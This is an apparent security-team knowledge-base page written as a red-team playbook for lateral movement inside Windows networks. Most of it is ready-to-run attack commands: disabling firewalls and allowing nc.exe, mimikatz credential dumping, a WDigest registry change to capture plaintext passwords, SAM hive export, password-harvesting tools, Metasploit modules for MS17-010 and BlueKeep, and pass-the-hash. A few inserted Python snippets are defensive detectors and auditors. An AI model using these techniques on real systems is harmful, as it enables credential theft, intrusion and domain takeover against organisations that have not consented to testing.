<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>Intranet Lateral Movement Techniques | WgpSec Security Team Public Knowledge Base</title>
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="Dedicated to building an information-security utopia">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><main class="page"> <div class="theme-antdocs-content content__default"><h1 id="内网信息收集">Intranet Information Gathering <a href="#内网信息收集" class="header-anchor">#</a></h1> <blockquote><p><strong>The depth of information gathering directly determines whether an internal penetration test succeeds or fails.</strong></p></blockquote> <p><strong>Once inside the intranet, red-team operators usually continue gathering information and intelligence on the local host and on the internal network.</strong></p> <p>This includes collecting the current machine's network connections, process list, command-execution history, database information, current-user information, administrator logon information, observed password patterns, patch-update frequency and similar data;</p> <p>at the same time they probe the IPs, hostnames, open ports and services of the other machines on the intranet.</p> <p>They then exploit weaknesses of internal machines, such as unpatched vulnerabilities, absent security controls and reused passwords, to move laterally and expand their foothold.</p> <p>In an intranet with a domain, red-team operators look for traces of domain-administrator logons while expanding their access.</p> <p>Once a server with a domain-administrator logon is found, tools such as Mimikatz can be used to try to obtain the logon account's plaintext password, or a hashdump tool to export the NTLM hash, which then leads to compromise of the domain controller.</p> <p>While roaming the intranet, red-team operators focus on positions such as the mail server, the OA system, the version-control server, the centralised operations platform, the unified authentication (SSO) system and the domain controller, trying to gain control of core systems and core business functions and to obtain core data, thereby completing the objective.</p> <h2 id="本机信息收集">Local Host Information Gathering <a href="#本机信息收集" class="header-anchor">#</a></h2> <p><strong>User privileges</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">whoami</span> /all
<span class="token comment"># check the current user's specific privileges on the target system</span>

quser
<span class="token comment"># list users currently logged on to this machine; note whether an administrator is on right now</span>

net user
<span class="token comment"># list all user names on this machine</span>

net localgroup
<span class="token comment"># list all groups on this machine and learn what each one is for, e.g. IT, HR, ADMIN, FILE</span>

net localgroup <span class="token string">&quot;Administrators&quot;</span>
<span class="token comment"># list the members of the specified group</span>
</code></pre></div><p><strong>Basic system information</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>ipconfig /all
<span class="token comment"># get the local network configuration</span>

systeminfo
<span class="token comment"># view basic system information (OS version, installed software and patches, whether the host is domain-joined)</span>

net statistics workstation
<span class="token comment"># view the host's boot time</span>

<span class="token builtin class-name">echo</span> %PROCESSOR_ARCHITECTURE%
<span class="token comment"># view the system architecture, e.g. x86 or AMD64</span>

tasklist
<span class="token comment"># list local processes and check for VPN clients, antivirus and similar software</span>

wmic service list brief
<span class="token comment"># view local service information</span>

wmic startup get command,caption
<span class="token comment"># view startup program information</span>

schtasks /query /fo LIST /v
<span class="token comment"># view scheduled tasks</span>
</code></pre></div><p><strong>Network information</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">netstat</span> -ano
<span class="token comment"># list all local TCP and UDP connections with their owning PIDs</span>

net share
<span class="token comment"># list local shares and accessible domain shares</span>

wmic share get name,path,status
<span class="token comment"># list shares via wmic</span>

REG QUERY <span class="token string">&quot;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings&quot;</span>
<span class="token comment"># view the proxy configuration</span>
</code></pre></div><p><code>wmic</code> is the Windows Management Instrumentation command-line tool; it supports system administration from the command line and from batch scripts.</p> <p>It has shipped with Windows since XP.</p> <p><strong>Firewall information and configuration (changing the firewall requires administrator privileges)</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment"># show all dynamic inbound rules</span>
netsh advfirewall firewall show rule <span class="token assign-left variable">name</span><span class="token operator">=</span>all <span class="token assign-left variable">dir</span><span class="token operator">=</span>in <span class="token assign-left variable">type</span><span class="token operator">=</span>dynamic

<span class="token comment"># turn the firewall off</span>
netsh advfirewall <span class="token builtin class-name">set</span> allprofiles state off

<span class="token comment"># allow inbound</span>
netsh advfirewall firewall <span class="token function">add</span> rule <span class="token assign-left variable">name</span><span class="token operator">=</span><span class="token string">&quot;pass nc&quot;</span> <span class="token assign-left variable">dir</span><span class="token operator">=</span>in <span class="token assign-left variable">action</span><span class="token operator">=</span>allow <span class="token assign-left variable">program</span><span class="token operator">=</span><span class="token string">&quot;c:\nc.exe&quot;</span>

<span class="token comment"># allow outbound</span>
netsh advfirewall firewall <span class="token function">add</span> rule <span class="token assign-left variable">name</span><span class="token operator">=</span><span class="token string">&quot;Allow nc&quot;</span> <span class="token assign-left variable">dir</span><span class="token operator">=</span>out <span class="token assign-left variable">action</span><span class="token operator">=</span>allow <span class="token assign-left variable">program</span><span class="token operator">=</span><span class="token string">&quot;c:\nc.exe&quot;</span>

<span class="token comment"># open port 3389</span>
netsh advfirewall firewall <span class="token function">add</span> rule <span class="token assign-left variable">name</span><span class="token operator">=</span><span class="token string">&quot;remote Desktop&quot;</span> <span class="token assign-left variable">protocol</span><span class="token operator">=</span>TCP <span class="token assign-left variable">dir</span><span class="token operator">=</span>in <span class="token assign-left variable">localport</span><span class="token operator">=</span><span class="token number">3389</span> <span class="token assign-left variable">action</span><span class="token operator">=</span>allow

<span class="token comment"># set a custom firewall log location</span>
netsh advfirewall <span class="token builtin class-name">set</span> currentprofile logging filename <span class="token string">&quot;c:\windows\temp\fw.log&quot;</span>

<span class="token comment"># Server 2003 and earlier</span>
netsh firewall <span class="token builtin class-name">set</span> opmode disable	<span class="token comment"># turn the firewall off</span>
netsh firewall <span class="token function">add</span> allowedprogram c:<span class="token punctuation">\</span>nc.exe <span class="token string">&quot;allow nc&quot;</span> <span class="token builtin class-name">enable</span>	<span class="token comment"># allow all connections for the specified program</span>
</code></pre></div><p><strong>Operating the local Remote Desktop (RDP) service (enabling and disabling RDP requires administrator privileges)</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>wmic RDTOGGLE WHERE <span class="token assign-left variable">ServerName</span><span class="token operator">=</span><span class="token string">'%COMPUTERNAME%'</span> call SetAllowTSConnections <span class="token number">1</span>
<span class="token comment"># enable</span>

wmic RDTOGGLE WHERE <span class="token assign-left variable">ServerName</span><span class="token operator">=</span><span class="token string">'%COMPUTERNAME%'</span> call SetAllowTSConnections <span class="token number">0</span>
<span class="token comment"># disable</span>

<span class="token comment"># the following command queries the RDP service port; the value is returned in hexadecimal</span>
REG QUERY <span class="token string">&quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp&quot;</span> /V PortNumber
</code></pre></div><h2 id="主机发现">Host Discovery <a href="#主机发现" class="header-anchor">#</a></h2> <p><strong>Check various history records (passive host discovery, low noise)</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment"># 1. bash history</span>
<span class="token function">history</span>
<span class="token function">cat</span> ~/.bash_history

<span class="token comment"># 2. hosts file (domain-name bindings), Linux &amp; Windows</span>
<span class="token function">cat</span> /etc/hosts
<span class="token builtin class-name">type</span> c:<span class="token punctuation">\</span>Windows<span class="token punctuation">\</span>system32<span class="token punctuation">\</span>drivers<span class="token punctuation">\</span>etc<span class="token punctuation">\</span>hosts

<span class="token comment"># 3. mstsc inbound and outbound connection history</span>
<span class="token comment"># https://github.com/Heart-Sky/ListRDPConnections</span>
<span class="token comment"># may reveal cross-segment connections and locate the workstations of operations staff</span>

<span class="token comment"># 4. browser history</span>
<span class="token comment"># look for intranet applications visited in the browser</span>
</code></pre></div><p><strong>View the routing table</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">netstat</span> -r
</code></pre></div><p><strong>ARP-based</strong></p> <p>ARP-based discovery easily bypasses most application-layer firewalls; only a dedicated ARP firewall will catch it.</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>arp -a
<span class="token comment"># view the ARP cache on Windows</span>
</code></pre></div><p><strong>ICMP-based</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token keyword">for</span> /L %I <span class="token keyword">in</span> <span class="token punctuation">(</span><span class="token number">1,1</span>,254<span class="token punctuation">)</span> DO @ping -w <span class="token number">1</span> -n <span class="token number">1</span> <span class="token number">192.168</span>.2.%I <span class="token operator">|</span> findstr <span class="token string">&quot;TTL=&quot;</span>
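</code></pre></div>
<p>The ICMP sweep above is easy to spot from the host firewall's own log, the same log that the firewall section earlier shows being relocated with <code>netsh advfirewall set currentprofile logging filename</code>. The Python below is an added example written for this page, not code from the original article: it parses Windows Firewall log lines in their standard <code>#Fields:</code> layout (the sample lines are constructed) and flags any source that sends ICMP echo requests (type 8) to many distinct hosts within a short window. The threshold and window values are assumptions.</p>

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Standard Windows Firewall log field names (W3C-style header). Only used as a fallback
# when a log fragment arrives without its own "#Fields:" line.
FIELDS = ("date time action protocol src-ip dst-ip src-port dst-port size "
          "tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path").split()

# Constructed sample: pfirewall.log lines as they look after being collected from several
# hosts on 192.168.2.0/24. 192.168.2.50 probes one host per second (a sweep);
# 192.168.2.10 pings its gateway twice and opens one SMB connection (normal activity).
SAMPLE_LOG = """#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2024-01-15 10:00:00 ALLOW ICMP 192.168.2.10 192.168.2.1 - - 60 - - - - 8 0 - SEND
2024-01-15 10:00:01 ALLOW ICMP 192.168.2.50 192.168.2.11 - - 60 - - - - 8 0 - RECEIVE
2024-01-15 10:00:02 ALLOW ICMP 192.168.2.50 192.168.2.12 - - 60 - - - - 8 0 - RECEIVE
2024-01-15 10:00:03 DROP ICMP 192.168.2.50 192.168.2.13 - - 60 - - - - 8 0 - RECEIVE
2024-01-15 10:00:04 DROP ICMP 192.168.2.50 192.168.2.14 - - 60 - - - - 8 0 - RECEIVE
2024-01-15 10:00:05 ALLOW ICMP 192.168.2.50 192.168.2.15 - - 60 - - - - 8 0 - RECEIVE
2024-01-15 10:00:06 ALLOW ICMP 192.168.2.50 192.168.2.16 - - 60 - - - - 8 0 - RECEIVE
2024-01-15 10:00:07 ALLOW ICMP 192.168.2.50 192.168.2.17 - - 60 - - - - 8 0 - RECEIVE
2024-01-15 10:00:08 ALLOW ICMP 192.168.2.50 192.168.2.18 - - 60 - - - - 8 0 - RECEIVE
2024-01-15 10:00:09 ALLOW ICMP 192.168.2.50 192.168.2.19 - - 60 - - - - 8 0 - RECEIVE
2024-01-15 10:00:10 ALLOW ICMP 192.168.2.50 192.168.2.20 - - 60 - - - - 8 0 - RECEIVE
2024-01-15 10:00:30 ALLOW ICMP 192.168.2.10 192.168.2.1 - - 60 - - - - 8 0 - SEND
2024-01-15 10:00:31 ALLOW TCP 192.168.2.10 192.168.2.30 50123 445 52 S 1 0 65535 - - - SEND
"""


def parse_firewall_log(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = FIELDS
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # honour the header actually present
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue                            # malformed line: skip rather than guess
        yield dict(zip(fields, parts))


def detect_icmp_sweeps(text, min_targets=8, window_seconds=60):
    """Return {src_ip: sorted distinct dst_ips} for every source that sent ICMP echo
    requests (type 8) to at least min_targets distinct hosts within window_seconds.
    The largest target set seen for a source is reported."""
    echoes = defaultdict(list)                  # src -> [(timestamp, dst), ...]
    for rec in parse_firewall_log(text):
        if rec["protocol"] != "ICMP" or rec["icmptype"] != "8":
            continue
        ts = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        echoes[rec["src-ip"]].append((ts, rec["dst-ip"]))
    window = timedelta(seconds=window_seconds)
    hits = {}
    for src, events in echoes.items():
        events.sort()
        start = 0                               # sliding window over time-ordered events
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            targets = {dst for _, dst in events[start:end + 1]}
            if len(targets) >= min_targets and len(targets) > len(hits.get(src, ())):
                hits[src] = sorted(targets)
    return hits


if __name__ == "__main__":
    for src, targets in detect_icmp_sweeps(SAMPLE_LOG).items():
        print("possible ICMP sweep from %s: %d targets (%s ... %s)"
              % (src, len(targets), targets[0], targets[-1]))
```

<p>A single host's log only records echoes addressed to that host, so the fan-out becomes visible only after the logs of several hosts are collected centrally; tune <code>min_targets</code> and <code>window_seconds</code> to the environment.</p>
<div class="language-bash line-numbers-mode"><pre class="language-bash"><code>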
</code></pre></div><p><strong>SPN scanning for services (domain)</strong></p> <p>Every important service in a domain has a corresponding SPN, so a port scan is unnecessary:</p> <p>an SPN scan alone locates most application servers.</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment"># list all SPNs in the current domain (built-in command)</span>
setspn -q */*
</code></pre></div><p><strong>Port scanning</strong></p> <p>Use fscan to scan the C-class or B-class range for high-risk ports (21,22,445,3389,3306,1443,1521,6379) and web ports.</p> <h1 id="本机密码和散列值获取">Obtaining Local Passwords and Hashes <a href="#本机密码和散列值获取" class="header-anchor">#</a></h1> <h2 id="lm-hash和ntml-hash">LM Hash and NTLM Hash <a href="#lm-hash和ntml-hash" class="header-anchor">#</a></h2> <p>A Windows password is stored as two hashed values, the <code>LM Hash</code> and the <code>NTLM Hash</code>.</p> <p>The LM Hash (LAN Manager Hash) is DES-based; a password shorter than 14 characters is padded with <code>0</code>.</p> <p>Since <code>Server 2003</code>, Windows authentication has used the NTLM Hash.</p> <p>From <code>Server 2008</code> onwards the <code>LM Hash</code> is disabled by default, and NTLM is used when the password exceeds 14 characters.</p> <p>If the captured <code>LM Hash</code> is <code>AAD3B435B51404EEAAD3B435B51404EE</code>, the password is empty or the <code>LM Hash</code> is disabled.</p> <table><thead><tr><th style="text-align:left;"></th> <th style="text-align:left;">2003</th> <th style="text-align:left;">win7</th> <th style="text-align:left;">2008</th> <th style="text-align:left;">2012</th></tr></thead> <tbody><tr><td style="text-align:left;">LM</td> <td style="text-align:left;">√</td> <td style="text-align:left;"></td> <td style="text-align:left;"></td> <td style="text-align:left;"></td></tr> <tr><td style="text-align:left;">NTLM</td> <td style="text-align:left;">√</td> <td style="text-align:left;">√</td> <td style="text-align:left;">√</td> <td style="text-align:left;">√</td></tr></tbody></table> <p><strong>Hashes are generally stored in two places</strong></p> <blockquote><p><strong>SAM file</strong>: stored on the local machine, holds local users</p> <p><strong>NTDS.DIT file</strong>: stored on the domain controller, holds domain users</p></blockquote> <h2 id="获取凭证的快捷路径">Shortcuts to Obtaining Credentials <a href="#获取凭证的快捷路径" class="header-anchor">#</a></h2> <p>Go through the user's desktop; it may contain server password information, possibly for other servers as well.</p> <p>Look for internal wiki manuals, mailboxes and similar sources; they may contain server IPs and passwords.</p> <h2 id="server-2012-抓明文密码">Dumping Plaintext Passwords on Server 2012 <a href="#server-2012-抓明文密码" class="header-anchor">#</a></h2> <p><strong>On Server 2008 and earlier, plaintext passwords can be dumped directly</strong></p> <p>Upload mimikatz to the target host (it must evade antivirus) and run it with SYSTEM privileges.</p> <div class="language-bash 
line-numbers-mode"><pre class="language-bash"><code><span class="token comment"># read hashes and plaintext passwords</span>
mimikatz.exe <span class="token string">&quot;privilege::debug&quot;</span> <span class="token string">&quot;log&quot;</span> <span class="token string">&quot;sekurlsa::logonpasswords&quot;</span> <span class="token builtin class-name">exit</span>
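</code></pre></div>
<p>The LM/NTLM section above gives the LM value that means "empty password or LM disabled" (<code>AAD3B435B51404EEAAD3B435B51404EE</code>). A defender reviewing a credential dump, for example during incident response, wants to know which accounts still had an LM hash stored (LM hashing not actually disabled on that host) and which had an empty or trivially weak password. The Python below is an added example, not code from the original article: it parses lines in the common <code>user:rid:lmhash:nthash:::</code> (pwdump) format, constructed here, and classifies each account. The NT hash is MD4 over the UTF-16LE password (a fact the article does not state), so a small MD4 implementation is included and the empty-password constant is computed rather than hard-coded; the sample hashes for <code>password</code> are the well-known LM/NT pair for that string.</p>

```python
# LM value for an empty password or disabled LM hashing (from the article).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def md4(data):
    """Plain-Python MD4 (RFC 1320); hashlib's md4 is often unavailable on modern OpenSSL builds."""
    mask = 0xFFFFFFFF

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    msg = bytearray(data) + b"\x80"             # pad: 0x80, zeros, 64-bit LE bit length
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += (len(data) * 8).to_bytes(8, "little")
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = [int.from_bytes(msg[off + 4 * j:off + 4 * j + 4], "little") for j in range(16)]
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):                     # round 1
            a = rotl((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                     # round 2
            k = (i % 4) * 4 + i // 4
            a = rotl((a + g(b, c, d) + x[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                     # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = (a0 + a) & mask, (b0 + b) & mask, (c0 + c) & mask, (d0 + d) & mask
    return b"".join(v.to_bytes(4, "little") for v in (a0, b0, c0, d0)).hex()


def nt_hash(password):
    """NT hash = MD4 of the password encoded as UTF-16LE."""
    return md4(password.encode("utf-16le"))


EMPTY_NT = nt_hash("")                          # 31d6cfe0d16ae931b73c59d7e0c089c0

# Constructed sample in pwdump format. svc_backup still has an LM hash stored; the
# Administrator and svc_backup NT hashes are the well-known value for "password".
SAMPLE_DUMP = """Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""

WEAK_PASSWORDS = ("password", "123456", "P@ssw0rd")   # assumed deny-list for the audit


def audit_dump(text, weak=WEAK_PASSWORDS):
    """Return {user: [findings]} for every account in pwdump-format text.
    Findings: 'lm-hash-stored', 'empty-password', 'weak-password:NAME'."""
    weak_nt = {nt_hash(pw): pw for pw in weak}
    report = {}
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[0]:
            continue                            # not a user:rid:lm:nt line
        user, lm, nt = parts[0], parts[2].lower(), parts[3].lower()
        findings = []
        if lm != EMPTY_LM:
            findings.append("lm-hash-stored")
        if nt == EMPTY_NT:
            findings.append("empty-password")
        elif nt in weak_nt:
            findings.append("weak-password:" + weak_nt[nt])
        report[user] = findings
    return report


if __name__ == "__main__":
    for user, findings in audit_dump(SAMPLE_DUMP).items():
        print("%-14s %s" % (user, ", ".join(findings) or "ok"))
```

<p>Treat the audit output as being as sensitive as the dump itself. A stored LM hash on a post-2008 host means the default "do not store LAN Manager hash" policy has been overridden; correct the policy and force a password change so the LM value is cleared.</p>
<div class="language-bash line-numbers-mode"><pre class="language-bash"><code>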
</code></pre></div><p><strong>Dumping plaintext passwords on Server 2012:</strong></p> <blockquote><p>Manually modify the registry + force a lock screen + wait for the target's administrator to log on again + export the hashes + recover the plaintext locally with mimikatz</p></blockquote> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment"># modify the registry so that WDigest keeps the plaintext credential</span>
reg <span class="token function">add</span> HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d <span class="token number">1</span> /f

<span class="token comment"># restore</span>
reg <span class="token function">add</span> HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d <span class="token number">0</span> /f
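</code></pre></div>
<p>Both the RDP <code>PortNumber</code> query earlier (which returns the port in hexadecimal) and the WDigest <code>UseLogonCredential</code> value set just above can be verified by a defender from the output of <code>reg query</code>. The Python below is an added example, not code from the original article: it parses constructed <code>REG QUERY</code> output for the two keys discussed on this page, converts REG_DWORD values from hex, and reports whether each matches the hardened state (UseLogonCredential absent or 0; RDP on its default port 3389). The output layout assumed is the standard key-path line followed by indented <code>Name    Type    Data</code> lines that reg.exe prints; the value names other than the two discussed are constructed filler.</p>

```python
import re

# Constructed reg query output for the two keys this page discusses. Real reg.exe output
# has the same shape: a key path line, then "    Name    Type    Data" lines.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
    PortNumber    REG_DWORD    0xd3d

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    Negotiate    REG_DWORD    0x0
    UseLogonCredential    REG_DWORD    0x1
"""

RDP_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
WDIGEST_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"

# Value lines are indented by four spaces and use four spaces between the columns.
VALUE_RE = re.compile(r"^\s{4}(\S.*?)\s{4}(REG_[A-Z_]+)\s{4}(.*)$")


def parse_reg_query(text):
    """Return {key_path: {value_name: (type, data)}}; REG_DWORD/REG_QWORD data become ints."""
    tree, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name, vtype, data = m.groups()
            if vtype in ("REG_DWORD", "REG_QWORD"):
                data = int(data, 16)            # reg.exe prints numeric data as 0x...
            tree[current][name] = (vtype, data)
        elif line.startswith("HKEY_"):
            current = line.strip()
            tree.setdefault(current, {})
    return tree


def assess(tree):
    """Return [(check, ok, detail)] comparing the parsed state with the hardened state."""
    results = []
    port = tree.get(RDP_KEY, {}).get("PortNumber", ("REG_DWORD", 3389))[1]
    results.append(("rdp-port", port == 3389, "RDP listens on %d" % port))
    wd = tree.get(WDIGEST_KEY, {}).get("UseLogonCredential")
    if wd is None:
        results.append(("wdigest", True, "UseLogonCredential absent: plaintext not cached"))
    else:
        results.append(("wdigest", wd[1] == 0,
                        "UseLogonCredential = %d (1 caches plaintext credentials)" % wd[1]))
    return results


if __name__ == "__main__":
    for check, ok, detail in assess(parse_reg_query(SAMPLE_REG_OUTPUT)):
        print("%-8s %-4s %s" % (check, "ok" if ok else "FAIL", detail))
```

<p>Compare the parsed state against a baseline on a schedule; a <code>UseLogonCredential</code> value of 1 that nobody can account for should be treated as preparation to harvest plaintext credentials at the next logon, and reverting it with the "restore" command above is the immediate fix.</p>
<div class="language-bash line-numbers-mode"><pre class="language-bash"><code>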
</code></pre></div><p>Force a lock screen</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>rundll32.exe user32.dll,LockWorkStation
</code></pre></div><h2 id="导出ntml-hash">Exporting the NTLM Hash <a href="#导出ntml-hash" class="header-anchor">#</a></h2> <h3 id="sharpdump-mimikatz本地读取">SharpDump + local mimikatz read <a href="#sharpdump-mimikatz本地读取" class="header-anchor">#</a></h3> <p>Requires the .NET 3.5 framework and system administrator privileges.</p> <p>Download: https://github.com/GhostPack/SharpDump</p> <p>The dumped file has a .bin extension by default; copy it to your own machine, rename .bin to .zip, extract it and hand the result to mimikatz.</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>mimikatz.exe <span class="token string">&quot;sekurlsa::minidump debug45&quot;</span> <span class="token string">&quot;sekurlsa::logonPasswords full&quot;</span> <span class="token string">&quot;exit&quot;</span>
</code></pre></div><h3 id="注册表-mimikatz本地读取">Registry + local mimikatz read <a href="#注册表-mimikatz本地读取" class="header-anchor">#</a></h3> <p><strong>(1) Export the SAM and SYSTEM files</strong></p> <p>On Windows 2000 and XP you must first escalate to <code>SYSTEM</code>; from Server 2003 onwards <code>reg save</code> works directly, though it still requires <code>system administrator privileges</code>.</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>reg save hklm<span class="token punctuation">\</span>sam sam.hive
reg save hklm<span class="token punctuation">\</span>system system.hive
reg save hklm<span class="token punctuation">\</span>security security.hive
</code></pre></div><p><strong>(2) Read the NTLM hashes locally with mimikatz</strong></p> <blockquote><p>mimikatz can extract plaintext passwords, hashes, PINs and Kerberos tickets from memory;</p> <p>it can also perform pass-the-hash and pass-the-ticket and forge Golden Tickets.</p></blockquote> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment"># Place the exported hive files in the same directory as mimikatz</span>
mimikatz.exe <span class="token string">&quot;lsadump::sam /sam:sam.hive /system:system.hive /security:security.hive&quot;</span> <span class="token builtin class-name">exit</span>
</code></pre></div><h1 id="横向获取主机权限">Gaining Host Access Laterally <a href="#横向获取主机权限" class="header-anchor">#</a></h1> <h2 id="获取历史连接凭证">Harvesting Saved Connection Credentials <a href="#获取历史连接凭证" class="header-anchor">#</a></h2> <p><strong>Saved RDP connection credentials</strong></p> <p>https://github.com/AlessandroZ/LaZagne</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>lazagne.exe windows
<span class="token comment"># Git credentials are recovered as well</span>
</code></pre></div><p><strong>Saved <code>wifi</code> passwords</strong></p> <p>https://github.com/wangle201210/wifiPass</p> <p><strong>XShell saved session credentials</strong></p> <p>https://github.com/dzxs/Xdecrypt</p> <p><strong>Browser history and credentials</strong></p> <p>https://github.com/moonD4rk/HackBrowserData</p> <h2 id="翻阅配置文件">Reading Configuration Files <a href="#翻阅配置文件" class="header-anchor">#</a></h2> <p><strong>Database configuration files</strong></p> <p>JSP sites</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;webroot&gt;/WEB-INF/classes/database.properties
</code></pre></div><p>Finding passwords in a MySQL database</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">find</span> / -name user.MYD
/var/lib/mysql/mysql/user.MYD
<span class="token comment"># Download it and crack the MD5 hash to obtain the root password</span>
</code></pre></div><p><strong>Common application configuration file locations</strong></p> <div class="language- line-numbers-mode"><pre class="language-text"><code>Tomcat:	$CATALINA_HOME/conf/server.xml
Apache:	/etc/httpd/conf/httpd.conf
Nginx:	/etc/nginx/nginx.conf
</code></pre></div><h2 id="弱口令">Weak Passwords <a href="#弱口令" class="header-anchor">#</a></h2> <p>1. Build a dictionary from known passwords plus common weak ones, then proxy <code>SNETCracker</code> into the network to scan SSH, RDP, MySQL and similar services</p> <p>2. Weak passwords on web admin panels and default passwords on network devices</p> <p>3. Tip: if you can get into the mail or wiki system and find initial passwords there, you can gain access to hosts in bulk</p> <h2 id="系统漏洞">System Vulnerabilities <a href="#系统漏洞" class="header-anchor">#</a></h2> <p><strong>MS17-010 (CVE-2017-0143)</strong></p> <p>MSF offers two approaches:</p> <ul><li>Reverse shell: <code>exploit/windows/smb/ms17_010_psexec</code>, requires port forwarding on the host</li> <li>Direct command execution: <code>auxiliary/admin/smb/ms17_010_command</code>, runs commands directly on the host</li></ul> <p><strong>Win7 RDP RCE (CVE-2019-0708)</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>auxiliary/scanner/rdp/cve_2019_0708_bluekeep

exploit/windows/rdp/cve_2019_0708_bluekeep_rce
</code></pre></div><h2 id="未授权访问漏洞">Unauthenticated Access Vulnerabilities <a href="#未授权访问漏洞" class="header-anchor">#</a></h2> <div class="language- line-numbers-mode"><pre class="language-text"><code>Redis unauthenticated access
MongoDB unauthenticated access
Hadoop unauthenticated access
</code></pre></div><h2 id="web应用漏洞">Web Application Vulnerabilities <a href="#web应用漏洞" class="header-anchor">#</a></h2> <p>Focus on directly exploitable component vulnerabilities such as <code>Shiro deserialization</code>, <code>Weblogic</code> and <code>Struts2</code></p> <p>plus web vulnerabilities that yield a shell, such as SQL injection and file upload</p> <h2 id="重点目标系统">High-Value Target Systems <a href="#重点目标系统" class="header-anchor">#</a></h2> <p>Monitoring systems such as <code>Zabbix</code>, which ship with default credentials (Admin/zabbix)</p> <p>Getting into the <code>bastion host</code> through its default password yields host access across the board and maxes out the score for that path</p> <p>Check the <code>wiki system</code>: many organizations post initial passwords there, which can then be fed into weak-password scanning</p> <h2 id="凭证传递攻击">Credential Passing Attacks <a href="#凭证传递攻击" class="header-anchor">#</a></h2> <p>Pass-the-hash and pass-the-ticket are attack methods used in domain penetration</p> <p>Pass-the-hash against a local account only succeeds when the target has the same password (a domain admin account can log on anywhere)</p> <p>CS can be used to scan port 445 directly, dump the hashes and pass them</p> <blockquote><p>The principle of hash injection is to inject the local or domain user hash prepared for the target machine into the local authentication process <code>lsass.exe</code>,</p> <p>so that a local <code>ipc</code> logon to the target machine is granted the same access as a logon to one's own machine</p> <p>Restricted Admin mode must be supported; it is supported by default from Server 2012 R2 onward</p></blockquote></div> <footer class="page-edit"><div class="last-updated"><span 